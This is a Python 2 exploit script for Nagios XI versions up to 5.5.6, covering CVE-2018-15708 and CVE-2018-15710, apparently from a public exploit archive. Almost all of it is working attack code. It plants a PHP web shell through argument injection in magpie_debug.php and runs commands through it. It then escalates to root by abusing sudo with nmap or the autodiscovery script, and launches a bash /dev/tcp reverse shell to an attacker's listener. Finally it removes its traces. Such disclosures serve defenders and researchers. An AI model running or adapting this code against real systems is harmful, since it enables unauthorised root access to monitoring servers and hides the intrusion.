# Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation
# Date: 2019-01-22
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.nagios.com/
# Product: Nagios XI
# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.6.tar.gz
# Version: From 2012r1.0 to 5.5.6
# Tested on:
# - CentOS Linux 7.5.1804 (Core) / Kernel 3.10.0 / This was a vendor-provided .OVA file
# - Nagios XI 2012r1.0, 5r1.0, and 5.5.6
# CVE: CVE-2018-15708, CVE-2018-15710
#
# See Also:
# https://www.tenable.com/security/research/tra-2018-37
# https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172
#
# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop a root reverse shell.
# You'll need your own Netcat listener
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer, threading, ssl
import requests, urllib
import sys, os, argparse
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
TIMEOUT = 5 # sec
def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)
# handle sending a get request
def http_get_quiet(url):
try:
r = requests.get(url, timeout=TIMEOUT, verify=False)
except requests.exceptions.ReadTimeout:
err_and_exit("Request to '" + url + "' timed out.")
else:
return r
# 200?
def url_ok(url):
r = http_get_quiet(url)
return (r.status_code == 200)
# run a shell command using the PHP file we uploaded
def send_shell_cmd(path, cmd):
querystr = { 'cmd' : cmd }
# e.g. http://blah/exec.php?cmd=whoami
url = path + '?' + urllib.urlencode(querystr)
return http_get_quiet(url)
# delete some files locally and on the Nagios XI instance
def clean_up(remote, paths, exec_path=None):
if remote:
for path in paths:
send_shell_cmd(exec_path, 'rm ' + path)
print 'Removing remote file ' + path
else:
for path in paths:
os.remove(path)
print 'Removing local file ' + path
# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html
def generate_self_signed_cert(cert_dir, cert_file, key_file):
"""Generate a SSL certificate.
If the cert_path and the key_path are present they will be overwritten.
"""
if not os.path.exists(cert_dir):
os.makedirs(cert_dir)
cert_path = os.path.join(cert_dir, cert_file)
key_path = os.path.join(cert_dir, key_file)
if os.path.exists(cert_path):
os.unlink(cert_path)
if os.path.exists(key_path):
os.unlink(key_path)
# create a key pair
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 1024)
# create a self-signed cert
cert = crypto.X509()
cert.get_subject().C = 'US'
cert.get_subject().ST = 'Lorem'
cert.get_subject().L = 'Ipsum'
cert.get_subject().O = 'Lorem'
cert.get_subject().OU = 'Ipsum'
cert.get_subject().CN = 'Unknown'
cert.set_serial_number(1000)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(key)
cert.sign(key, 'sha1')
with open(cert_path, 'wt') as fd:
fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(key_path, 'wt') as fd:
fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
return cert_path, key_path
# HTTP request handler
class MyHTTPD(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
msg = '<?php system($_GET[\'cmd\']); ?>' # this will be written to the PHP file
self.end_headers()
self.wfile.write(str.encode(msg))
# Make the http listener operate on its own thread
class ThreadedWebHandler(object):
def __init__(self, host, port, keyfile, certfile):
self.server = SocketServer.TCPServer((host, port), MyHTTPD)
self.server.socket = ssl.wrap_socket(
self.server.socket,
keyfile=keyfile,
certfile=certfile,
server_side=True
)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
def start(self):
self.server_thread.start()
def stop(self):
self.server.shutdown()
self.server.server_close()
##### MAIN #####
desc = 'Nagios XI 2012r1.0 < 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')
args = arg_parser.parse_args()
# Nagios XI target settings
target = { 'ip' : args.t }
# listener settings
listener = {
'ip' : args.ip,
'port' : args.port,
'ncip' : args.ncip,
'ncport': args.ncport
}
# generate self-signed cert
cert_file = 'cert.crt'
key_file = 'key.key'
generate_self_signed_cert('./', cert_file, key_file)
# start threaded listener
# thanks http://brahmlower.io/threaded-http-server.html
server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file)
server.start()
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
# path to Nagios XI app
base_url = 'https://' + target['ip']
# ensure magpie_debug.php exists
magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
if not url_ok(magpie_url):
err_and_exit('magpie_debug.php not found.')
print '\nFound magpie_debug.php.\n'
exec_path = None # path to exec.php in URL
cleanup_paths = [] # local path on Nagios XI filesystem to clean up
# ( local fs path : url path )
paths = [
( '/usr/local/nagvis/share/', '/nagvis' ),
( '/var/www/html/nagiosql/', '/nagiosql' )
]
# inject argument to create exec.php
# try multiple directories if necessary. dir will be different based on nagios xi version
filename = 'exec.php'
for path in paths:
local_path = path[0] + filename # on fs
url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php
url = magpie_url + '?url=' + url
print 'magpie url = ' + url
r = http_get_quiet(url)
# ensure php file was created
exec_url = base_url + path[1] + '/' + filename # e.g. https://192.168.1.192/nagiosql/exec.php
if url_ok(exec_url):
exec_path = exec_url
cleanup_paths.append(local_path)
break
# otherwise, try the next path
if exec_path is None:
err_and_exit('Couldn\'t create PHP file.')
print '\n' + filename + ' written. Visit ' + exec_url + '\n'
# run a few commands to display status to user
print 'Gathering some basic info...'
cmds = [
('whoami', 'Current User'),
("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version')
]
for cmd in cmds:
r = send_shell_cmd(exec_url, cmd[0])
sys.stdout.write('\t' + cmd[1] + ' => ' + r.text)
# candidates for privilege escalation
# depends on Nagios XI version
rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1'
# tuple contains (shell command, cleanup path)
priv_esc_list = [
("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'),
("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None)
]
# escalate privileges and launch the connect-back shell
timed_out = False
for priv_esc in priv_esc_list:
try:
querystr = { 'cmd' : priv_esc[0] }
url = exec_path + '?' + urllib.urlencode(querystr)
r = requests.get(url, timeout=TIMEOUT, verify=False)
print '\nTrying to escalate privs with url: ' + url
except requests.exceptions.ReadTimeout:
timed_out = True
if priv_esc[1] is not None:
cleanup_paths.append(priv_esc[1])
break
if timed_out:
print 'Check for a shell!!\n'
else:
print 'Not so sure it worked...\n'
server.stop()
# clean up files we created
clean_up(True, cleanup_paths, exec_path) # remote files
clean_up(False, [cert_file, key_file])